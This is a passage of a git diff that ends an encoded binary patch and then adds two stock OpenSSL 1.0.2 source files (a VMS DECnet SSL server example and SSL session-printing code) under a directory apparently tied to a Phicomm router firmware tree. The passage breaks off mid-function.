zEJ?lq4lG_W<oI-h7f(;Xb`kMA$>YLzlW!FMm*lqz-$%Yp_!r3kO*q~g<Notk!oNg*
zRQM6{2ZcXMJ}CTg^1l)OB>5rXPmw<={2B6Rh2vu-Z2x}<e}R0r@YCd96aGKs|0w({
z`Dx+!bOx9E6X9mRFH`>~{2huvFZ?3;1>x_L|3df_y}y>JcZ5$T|CR7r<a5L+ZXWrY
zB7OmRg^0%ogSfu)gfAt(DDni!TSa^Y`ENx0O7apBUq?Pgcr*E>!rREF3-2VKDSQL@
zEa7*NUnM+2zCifh<W~#Nk}ncIKz^O@UF1uJo8QMWb-nPt6dx4+AbD8$0rHi?&2M~}
zx>5LHimwy?FnLt?W8}@kzfN8){3!YRVt;s=yiLTPAiqoa_sKts7dNb&B0nztMe@bM
z&ye3E@|)j}G8NO$;fo76Pw{(1{F~%o7XB;puL=JR`E$Zcbib6TmxW(S{<iR$<Yi*L
z=8)G2zluC6{A%*sgkMK~m+<S!Q^LdKL&B@c_Y1#~{9)ly@^1=nC4W`;TJkaB-Q=^y
zcHBfB7H)oz%T$~2yD9#Z$e$(ug4iwt<U2*4d&##8A0fY2IPQ6+YFcpzq_O)U{t9+|
zYp>bAOm3&`^)vpiWBf~czf;OyyFW+%3JkH>>-Tfym(zM#A0@ZPwK-40y#mBx{%=$N
zSjY1h`lskp*|taJ^Qq1FtT7l@!M13)62J9VL{H;aNRL(MZ#`avqqTZEtiQ|kcQt<N
zuW*$HokG_$0lJ=<rE5oYKt$(==*$rvSgz|tbY!`fh)x?ZuG2(xhH_oETsOE}$4AV#
z&Rni@mg~CZx>mWaRiV8?*R3#()R`;H+UxHMz1%9Dvr>Oo=<jOn6*^~y&Q__jRqAY&
zI$NcVsnj_ub!4SpdZmu9((zR~zDmbenPuttD!ue7(^WdYTE|!G_-Yexmab!}b**Y$
zt44p<>UP$c*6QzYNH3sTSF6@ZYjn~YowP<Lt<f<xI$e#9tkDao(ebr9zE;QA>iAk6
zU#sJ5&4P7&t&R_ebcJw8*9eD971ID677pn;;gC)c4prgPO}!_&@STI_gqu?tcvy&<
z(+|TZFjpNHOTlxw&E8;kVu}f~ScQa}k5lr=^#fXh$Em%O#KRWH-y1XKlQ<I!I^I=U
zuR(-@J_A11Z$*THJ`+CH<A_ku@!rw;-H1@o1MsoF3lWNpA2zHVp9$FbhnT}VOy7?%
zzk>O9ne+CXU_OV%zsQ`&zs!6ti$BjCUya*#n(K12Uh|mGq4OxNFW!6GcyoO`u^(2j
z`1vgUCg!}IP0X)i@$Jk%#(XpLk2Cj}^ZcJ-j?V~e`|bU=+>W1T@t<JvN0={U{tf0=
zGe61PVg3W=*D!yB`6A}#I?41i?(??&^RVGiaBwYrtS@7J9rM-9@!5xsZ)U!Pc_;Iw
z%(pV<d2-D0H`M0;4D-KWzK{9!%>SPGa^{aS=ga*T^BY+FG3G($|H+)^Im3Jfi?{cY
zI6K7LUe}|CnU|Hq1Qc`!KDHm`GmkJ|!n~Zhz3;(1_^iw3>0t4d%zKzuG0!o_XH_=O
z2y;AVTECxpE%QUnr!xO4^OelM$(-l^F7r>Z_*2Yz{C_dWXKJ>cuQKQH?=Z)9n&&8R
zZAsT_*q=ADJTsW%HJi;pm-%Yu3z*k2zm|DD^X1GNm{%~5GGE2Kk$EHYCgyF-o0+d;
zelzn;%v+czn71;w_dVEew=nlu{2J!Fn71(>VUEAWwx9PgZ)bjh`C8_On0GKg!u&So
zk1_9L{seP;mTKGcBj)RvpJU$5{9Wd^GoMQLH`s3u^O?-oGhfIY_uFaod$5A}1{Pn<
z++n_&IX(-v>($Ae$8ThQ2aE4#&f`7i*v`|`&d)KwljV7k`6lLn%ly;Kzr_45<_|N+
zXW4eW{)PD#=1($@F@KtQ5A$c4$C<ytJi+`$<}UO9W!}sDRpx!n-(cR){MXEr%-?5@
z*QmB1rsBqcg8SQ6_*lQ3d5ZZw=G&MrWS(Zen0bbIka?DQ74v(TH!;sKU&lPpJjvW)
zo@MSahf!UyAMo=i{T|R^stw&fZ<(f}O)UCs3dDN{EH=+4$nn}9i}hvXc#Vz4dL{XM
z!@k#(<FzOj8-FXgqqXQ8$*&dek}nm04>?{tVX^t|CC6(REY^QY{e#ySSghOMSNv_o
zV*Te7kH5uOtiM5Cr?u$z_qb8`uPGjXgRs~<qvZJ8fyMg!<ao}<V*Q_Kz3^O(#rjlo
zJZECDKAjxTMOds~PQFEJ(XSv+2%kre$1E0`=VRn}tYNXfkQ|Q@EY=s1<35bVx_y4T
z!?5rFP4T;gze2uSc!YdJcoq3x;Va4a3BQSazwid~1Hzlh4+_79{E+Z=^25UI^UNc{
zZ>RW2gx^8_m~i`C_i^Dp6#s<qUh<>D?<Rjrc$)l}@ErLG;REC+h1b*h{dwW`mHjE<
zPttL5TKIR!UlRT_`5EEQke?O)EcrR%-zR@f_zUE(3;z-MTf$!?e^>YqsedjC|0?-=
z!tL`|cm%79J&wLd@#g(v@%Xa&?RA!of0^QEh&;<_yO{Tm#XQyYJ2Y3sf05$n3;zdl
z^FFee=PTrni2oM(wZe~+^XD+Q4nH7YF5-Ve9uodD@(SU<B(D)ZM!rgTg1k<+y^d@Y
zo}%~`;aPI?zO&dr_PVn}#P6W^b;5U%ZxFtle3S6&X*+HazL(+?!uOH)3*S$k5`KU@
zEBqk2C;Slk4&jH%cL_g2zFYVs<RilGr1jk^ypMdJ@FytGe&I*S4+wvX{Gjk-<cEZx
zAU`bpB>55H&yznQ{1o|P!oNuC^|<htDE<lIXULBVKTH0U@N?wHguh09Lip?CCxyR7
z{=D#a$xjKtNPb%Qaa!M(gx^Q;XN1>~pB27}{G9MQ^4EknlD{szh5RkyZRGC??;yV@
zd>#3F!Z(oX3ne%Y+VgoA^}`ed<}1jj3AgX>W(dET;%5oB`R5AXO!1ChYOy^u>HmKX
ztKrAK$7~VtcKdA-Zr@{Oh1>U-Bf{-_OnE(Ke>dgzlI;f-%nxq!Vm&bQa%R|X$8v5e
z7WCjx$10eBznrUJPd=}LxeQKVcsK|zr*x1p6@-5VZ-c)Ht04S&*$u+~HgAA;O!2KW
z-Ip!|;s4QDc*!(K72W>Lz4#YxTAM$9;6PQ}WoWbbiRx%<P|Tp+%a6l%4R~o#=ZhKX
z$Cm+6LNm+|-z{O?X=YN*r{Q99y4)dE>f2(uc7|O3a+rZR|JeHYj2d&|vu9rH@^{<g
zhi2O4+hG$pj?-@Lr&vYnJzvbA%P2pt4#p<yzk~Qv0Lp&Wf7m6m|L~b1E<XexUe@8u
z9w_(@ffw6uJH%&mcAUozQGISWE@OMaE`^U+O|_fqJ1~zI+kR`Gg%Qjt>mR22M{OVt
zW&J_$$@*`p`2(stM)h$2`v`n&eY^inwrs4jA%NdXox(~`usH+pk@YVFllvZ!T8ak-
Z6#4%u*?+SkX0rOPQTzAmEX6Nb|F>nA-(>&*

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_task.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_task.c
new file mode 100644
index 0000000..fb77075
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_task.c
@@ -0,0 +1,397 @@
+/* ssl/ssl_task.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* VMS */
+/*-
+ * DECnet object for servicing SSL.  We accept the inbound and speak a
+ * simple protocol for multiplexing the 2 data streams (application and
+ * ssl data) over this logical link.
+ *
+ * Logical names:
+ *    SSL_CIPHER        Defines a list of cipher specifications the server
+ *                      will support in order of preference.
+ *    SSL_SERVER_CERTIFICATE
+ *                      Points to PEM (privacy enhanced mail) file that
+ *                      contains the server certificate and private password.
+ *    SYS$NET           Logical created by netserver.exe as hook for completing
+ *                      DECnet logical link.
+ *
+ * Each NSP message sent over the DECnet link has the following structure:
+ *    struct rpc_msg {
+ *      char channel;
+ *      char function;
+ *      short length;
+ *      char data[MAX_DATA];
+ *    } msg;
+ *
+ * The channel field designates the virtual data stream this message applies
+ * to and is one of:
+ *   A - Application data (payload).
+ *   R - Remote client connection that initiated the SSL connection.  Encrypted
+ *       data is sent over this connection.
+ *   G - General data, reserved for future use.
+ *
+ * The data streams are half-duplex read/write and have following functions:
+ *   G - Get, requests that up to msg.length bytes of data be returned.  The
+ *       data is returned in the next 'C' function response that matches the
+ *       requesting channel.
+ *   P - Put, requests that the first msg.length bytes of msg.data be appended
+ *       to the designated stream.
+ *   C - Confirms a get or put.  Every get and put will get a confirm response,
+ *       you cannot initiate another function on a channel until the previous
+ *       operation has been confirmed.
+ *
+ *  The 2 channels may interleave their operations, for example:
+ *        Server msg           Client msg
+ *         A, Get, 4092          ---->
+ *                               <----  R, get, 4092
+ *         R, Confirm, {hello}   ---->
+ *                               <----  R, put, {srv hello}
+ *         R, Confirm, 0         ---->
+ *                               .              (SSL handshake completed)
+ *                               .              (read first app data).
+ *                               <----  A, confirm, {http data}
+ *         A, Put, {http data}   ---->
+ *                               <----  A, confirm, 0
+ *
+ *  The length field is not permitted to be larger that 4092 bytes.
+ *
+ * Author: Dave Jones
+ * Date:   22-JUL-1996
+ */
+#include <stdlib.h>
+#include <stdio.h>
+#include <iodef.h>              /* VMS IO$_ definitions */
+#include <descrip.h>            /* VMS string descriptors */
+extern int SYS$QIOW(), SYS$ASSIGN();
+int LIB$INIT_TIMER(), LIB$SHOW_TIMER();
+
+#include <string.h>             /* from ssltest.c */
+#include <errno.h>
+
+#include "e_os.h"
+
+#include <openssl/buffer.h>
+#include <openssl/x509.h>
+#include <openssl/ssl.h>
+#include <openssl/err.h>
+
+int MS_CALLBACK verify_callback(int ok, X509 *xs, X509 *xi, int depth,
+                                int error);
+BIO *bio_err = NULL;
+BIO *bio_stdout = NULL;
+BIO_METHOD *BIO_s_rtcp();
+
+static char *cipher = NULL;
+int verbose = 1;
+#ifdef FIONBIO
+static int s_nbio = 0;
+#endif
+#define TEST_SERVER_CERT "SSL_SERVER_CERTIFICATE"
+/*************************************************************************/
+/* Should have member alignment inhibited */
+struct rpc_msg {
+    /* 'A'-app data. 'R'-remote client 'G'-global */
+    char channel;
+    /* 'G'-get, 'P'-put, 'C'-confirm, 'X'-close */
+    char function;
+    /* Amount of data returned or max to return */
+    unsigned short int length;
+    /* variable data */
+    char data[4092];
+};
+#define RPC_HDR_SIZE (sizeof(struct rpc_msg) - 4092)
+
+static $DESCRIPTOR(sysnet, "SYS$NET");
+typedef unsigned short io_channel;
+
+struct io_status {
+    unsigned short status;
+    unsigned short count;
+    unsigned long stsval;
+};
+int doit(io_channel chan, SSL_CTX *s_ctx);
+/*****************************************************************************/
+/*
+ * Decnet I/O routines.
+ */
+static int get(io_channel chan, char *buffer, int maxlen, int *length)
+{
+    int status;
+    struct io_status iosb;
+    status = SYS$QIOW(0, chan, IO$_READVBLK, &iosb, 0, 0,
+                      buffer, maxlen, 0, 0, 0, 0);
+    if ((status & 1) == 1)
+        status = iosb.status;
+    if ((status & 1) == 1)
+        *length = iosb.count;
+    return status;
+}
+
+static int put(io_channel chan, char *buffer, int length)
+{
+    int status;
+    struct io_status iosb;
+    status = SYS$QIOW(0, chan, IO$_WRITEVBLK, &iosb, 0, 0,
+                      buffer, length, 0, 0, 0, 0);
+    if ((status & 1) == 1)
+        status = iosb.status;
+    return status;
+}
+
+/***************************************************************************/
+/*
+ * Handle operations on the 'G' channel.
+ */
+static int general_request(io_channel chan, struct rpc_msg *msg, int length)
+{
+    return 48;
+}
+
+/***************************************************************************/
+int main(int argc, char **argv)
+{
+    int status, length;
+    io_channel chan;
+    struct rpc_msg msg;
+
+    char *CApath = NULL, *CAfile = NULL;
+    int badop = 0;
+    int ret = 1;
+    int client_auth = 0;
+    int server_auth = 0;
+    SSL_CTX *s_ctx = NULL;
+    /*
+     * Confirm logical link with initiating client.
+     */
+    LIB$INIT_TIMER();
+    status = SYS$ASSIGN(&sysnet, &chan, 0, 0, 0);
+    printf("status of assign to SYS$NET: %d\n", status);
+    /*
+     * Initialize standard out and error files.
+     */
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE);
+    if (bio_stdout == NULL)
+        if ((bio_stdout = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_stdout, stdout, BIO_NOCLOSE);
+    /*
+     * get the preferred cipher list and other initialization
+     */
+    if (cipher == NULL)
+        cipher = getenv("SSL_CIPHER");
+    printf("cipher list: %s\n", cipher ? cipher : "{undefined}");
+
+    SSL_load_error_strings();
+    OpenSSL_add_all_algorithms();
+
+    /*
+     * DRM, this was the original, but there is no such thing as SSLv2()
+     * s_ctx=SSL_CTX_new(SSLv2());
+     */
+    s_ctx = SSL_CTX_new(SSLv2_server_method());
+
+    if (s_ctx == NULL)
+        goto end;
+
+    SSL_CTX_use_certificate_file(s_ctx, TEST_SERVER_CERT, SSL_FILETYPE_PEM);
+    SSL_CTX_use_RSAPrivateKey_file(s_ctx, TEST_SERVER_CERT, SSL_FILETYPE_PEM);
+    printf("Loaded server certificate: '%s'\n", TEST_SERVER_CERT);
+
+    /*
+     * Take commands from client until bad status.
+     */
+    LIB$SHOW_TIMER();
+    status = doit(chan, s_ctx);
+    LIB$SHOW_TIMER();
+    /*
+     * do final cleanup and exit.
+     */
+ end:
+    if (s_ctx != NULL)
+        SSL_CTX_free(s_ctx);
+    LIB$SHOW_TIMER();
+    return 1;
+}
+
+int doit(io_channel chan, SSL_CTX *s_ctx)
+{
+    int status, length, link_state;
+    struct rpc_msg msg;
+
+    SSL *s_ssl = NULL;
+    BIO *c_to_s = NULL;
+    BIO *s_to_c = NULL;
+    BIO *c_bio = NULL;
+    BIO *s_bio = NULL;
+    int i;
+    int done = 0;
+
+    s_ssl = SSL_new(s_ctx);
+    if (s_ssl == NULL)
+        goto err;
+
+    c_to_s = BIO_new(BIO_s_rtcp());
+    s_to_c = BIO_new(BIO_s_rtcp());
+    if ((s_to_c == NULL) || (c_to_s == NULL))
+        goto err;
+/*- original, DRM 24-SEP-1997
+    BIO_set_fd ( c_to_s, "", chan );
+    BIO_set_fd ( s_to_c, "", chan );
+*/
+    BIO_set_fd(c_to_s, 0, chan);
+    BIO_set_fd(s_to_c, 0, chan);
+
+    c_bio = BIO_new(BIO_f_ssl());
+    s_bio = BIO_new(BIO_f_ssl());
+    if ((c_bio == NULL) || (s_bio == NULL))
+        goto err;
+
+    SSL_set_accept_state(s_ssl);
+    SSL_set_bio(s_ssl, c_to_s, s_to_c);
+    BIO_set_ssl(s_bio, s_ssl, BIO_CLOSE);
+
+    /* We can always do writes */
+    printf("Begin doit main loop\n");
+    /*
+     * Link states: 0-idle, 1-read pending, 2-write pending, 3-closed.
+     */
+    for (link_state = 0; link_state < 3;) {
+        /*
+         * Wait for remote end to request data action on A channel.
+         */
+        while (link_state == 0) {
+            status = get(chan, (char *)&msg, sizeof(msg), &length);
+            if ((status & 1) == 0) {
+                printf("Error in main loop get: %d\n", status);
+                link_state = 3;
+                break;
+            }
+            if (length < RPC_HDR_SIZE) {
+                printf("Error in main loop get size: %d\n", length);
+                break;
+                link_state = 3;
+            }
+            if (msg.channel != 'A') {
+                printf("Error in main loop, unexpected channel: %c\n",
+                       msg.channel);
+                break;
+                link_state = 3;
+            }
+            if (msg.function == 'G') {
+                link_state = 1;
+            } else if (msg.function == 'P') {
+                link_state = 2; /* write pending */
+            } else if (msg.function == 'X') {
+                link_state = 3;
+            } else {
+                link_state = 3;
+            }
+        }
+        if (link_state == 1) {
+            i = BIO_read(s_bio, msg.data, msg.length);
+            if (i < 0)
+                link_state = 3;
+            else {
+                msg.channel = 'A';
+                msg.function = 'C'; /* confirm */
+                msg.length = i;
+                status = put(chan, (char *)&msg, i + RPC_HDR_SIZE);
+                if ((status & 1) == 0)
+                    break;
+                link_state = 0;
+            }
+        } else if (link_state == 2) {
+            i = BIO_write(s_bio, msg.data, msg.length);
+            if (i < 0)
+                link_state = 3;
+            else {
+                msg.channel = 'A';
+                msg.function = 'C'; /* confirm */
+                msg.length = 0;
+                status = put(chan, (char *)&msg, RPC_HDR_SIZE);
+                if ((status & 1) == 0)
+                    break;
+                link_state = 0;
+            }
+        }
+    }
+    fprintf(stdout, "DONE\n");
+ err:
+    /*
+     * We have to set the BIO's to NULL otherwise they will be free()ed
+     * twice.  Once when th s_ssl is SSL_free()ed and again when c_ssl is
+     * SSL_free()ed. This is a hack required because s_ssl and c_ssl are
+     * sharing the same BIO structure and SSL_set_bio() and SSL_free()
+     * automatically BIO_free non NULL entries. You should not normally do
+     * this or be required to do this
+     */
+    s_ssl->rbio = NULL;
+    s_ssl->wbio = NULL;
+
+    if (c_to_s != NULL)
+        BIO_free(c_to_s);
+    if (s_to_c != NULL)
+        BIO_free(s_to_c);
+    if (c_bio != NULL)
+        BIO_free(c_bio);
+    if (s_bio != NULL)
+        BIO_free(s_bio);
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_txt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_txt.c
new file mode 100644
index 0000000..45308d8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_txt.c
@@ -0,0 +1,262 @@
+/* ssl/ssl_txt.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#include <stdio.h>
+#include <openssl/buffer.h>
+#include "ssl_locl.h"
+
+#ifndef OPENSSL_NO_FP_API
+int SSL_SESSION_print_fp(FILE *fp, const SSL_SESSION *x)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file_internal())) == NULL) {
+        SSLerr(SSL_F_SSL_SESSION_PRINT_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = SSL_SESSION_print(b, x);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int SSL_SESSION_print(BIO *bp, const SSL_SESSION *x)
+{
+    unsigned int i;
+    const char *s;
+
+    if (x == NULL)
+        goto err;
+    if (BIO_puts(bp, "SSL-Session:\n") <= 0)
+        goto err;
+    if (x->ssl_version == SSL2_VERSION)
+        s = "SSLv2";
+    else if (x->ssl_version == SSL3_VERSION)
+        s = "SSLv3";
+    else if (x->ssl_version == TLS1_2_VERSION)
+        s = "TLSv1.2";
+    else if (x->ssl_version == TLS1_1_VERSION)
+        s = "TLSv1.1";
+    else if (x->ssl_version == TLS1_VERSION)
+        s = "TLSv1";
+    else if (x->ssl_version == DTLS1_VERSION)
+        s = "DTLSv1";
+    else if (x->ssl_version == DTLS1_2_VERSION)
+        s = "DTLSv1.2";
+    else if (x->ssl_version == DTLS1_BAD_VER)
+        s = "DTLSv1-bad";
+    else
+        s = "unknown";
+    if (BIO_printf(bp, "    Protocol  : %s\n", s) <= 0)
+        goto err;
+
+    if (x->cipher == NULL) {
+        if (((x->cipher_id) & 0xff000000) == 0x02000000) {
+            if (BIO_printf
+                (bp, "    Cipher    : %06lX\n", x->cipher_id & 0xffffff) <= 0)
+                goto err;
+        } else {
+            if (BIO_printf
+                (bp, "    Cipher    : %04lX\n", x->cipher_id & 0xffff) <= 0)
+                goto err;
+        }
+    } else {
+        if (BIO_printf
+            (bp, "    Cipher    : %s\n",
+             ((x->cipher == NULL) ? "unknown" : x->cipher->name)) <= 0)
+            goto err;
+    }
+    if (BIO_puts(bp, "    Session-ID: ") <= 0)
+        goto err;
+    for (i = 0; i < x->session_id_length; i++) {
+        if (BIO_printf(bp, "%02X", x->session_id[i]) <= 0)
+            goto err;
+    }
+    if (BIO_puts(bp, "\n    Session-ID-ctx: ") <= 0)
+        goto err;
+    for (i = 0; i < x->sid_ctx_length; i++) {
+        if (BIO_printf(bp, "%02X", x->sid_ctx[i]) <= 0)
+            goto err;
+    }
+    if (BIO_puts(bp, "\n    Master-Key: ") <= 0)
+        goto err;
+    for (i = 0; i < (unsigned int)x->master_key_length; i++) {
+        if (BIO_printf(bp, "%02X", x->master_key[i]) <= 0)
+            goto err;
+    }
+    if (BIO_puts(bp, "\n    Key-Arg   : ") <= 0)
+        goto err;
+    if (x->key_arg_length == 0) {
+        if (BIO_puts(bp, "None") <= 0)
+            goto err;
+    } else
+        for (i = 0; i < x->key_arg_length; i++) {
+            if (BIO_printf(bp, "%02X", x->key_arg[i]) <= 0)
+                goto err;
+        }
+#ifndef OPENSSL_NO_KRB5
+    if (BIO_puts(bp, "\n    Krb5 Principal: ") <= 0)
+        goto err;
+    if (x->krb5_client_princ_len == 0) {
+        if (BIO_puts(bp, "None") <= 0)
+            goto err;
+    } else
+        for (i = 0; i < x->krb5_client_princ_len; i++) {
+            if (BIO_printf(bp, "%02X", x->krb5_client_princ[i]) <= 0)
+                goto err;
+        }
+#endif                          /* OPENSSL_NO_KRB5 */
+#ifndef OPENSSL_NO_PSK
+    if (BIO_puts(bp, "\n    PSK identity: ") <= 0)
+        goto err;
+    if (BIO_printf(bp, "%s", x->psk_identity ? x->psk_identity : "None") <= 0)
+        goto err;
+    if (BIO_puts(bp, "\n    PSK identity hint: ") <= 0)
+        goto err;
+    if (BIO_printf
+        (bp, "%s", x->psk_identity_hint ? x->psk_identity_hint : "None") <= 0)
+        goto err;
+#endif
+#ifndef OPENSSL_NO_SRP
+    if (BIO_puts(bp, "\n    SRP username: ") <= 0)
+        goto err;
+    if (BIO_printf(bp, "%s", x->srp_username ? x->srp_username : "None") <= 0)
+        goto err;
+#endif
+#ifndef OPENSSL_NO_TLSEXT
+    if (x->tlsext_tick_lifetime_hint) {
+        if (BIO_printf(bp,
+                       "\n    TLS session ticket lifetime hint: %ld (seconds)",
+                       x->tlsext_tick_lifetime_hint) <= 0)
+            goto err;
+    }
+    if (x->tlsext_tick) {
+        if (BIO_puts(bp, "\n    TLS session ticket:\n") <= 0)
+            goto err;
+        if (BIO_dump_indent(bp, (char *)x->tlsext_tick, x->tlsext_ticklen, 4)
+            <= 0)
+            goto err;
+    }
+#endif
+
+#ifndef OPENSSL_NO_COMP
+    if (x->compress_meth != 0) {
+        SSL_COMP *comp = NULL;
+
+        ssl_cipher_get_evp(x, NULL, NULL, NULL, NULL, &comp);
+        if (comp == NULL) {
+            if (BIO_printf(bp, "\n    Compression: %d", x->compress_meth) <=
+                0)
+                goto err;
+        } else {
+            if (BIO_printf
+                (bp, "\n    Compression: %d (%s)", comp->id,
+                 comp->method->name) <= 0)
+                goto err;
+        }
+    }
+#endif
+    if (x->time != 0L) {
+        if (BIO_printf(bp, "\n    Start Time: %ld", x->time) <= 0)
+            goto err;
+    }
+    if (x->timeout != 0L) {
+        if (BIO_printf(bp, "\n    Timeout   : %ld (sec)", x->timeout) <= 0)
+            goto err;
+    }
+    if (BIO_puts(bp, "\n") <= 0)
+        goto err;
+
+    if (BIO_puts(bp, "    Verify return code: ") <= 0)
+        goto err;
+    if (BIO_printf(bp, "%ld (%s)\n", x->verify_result,
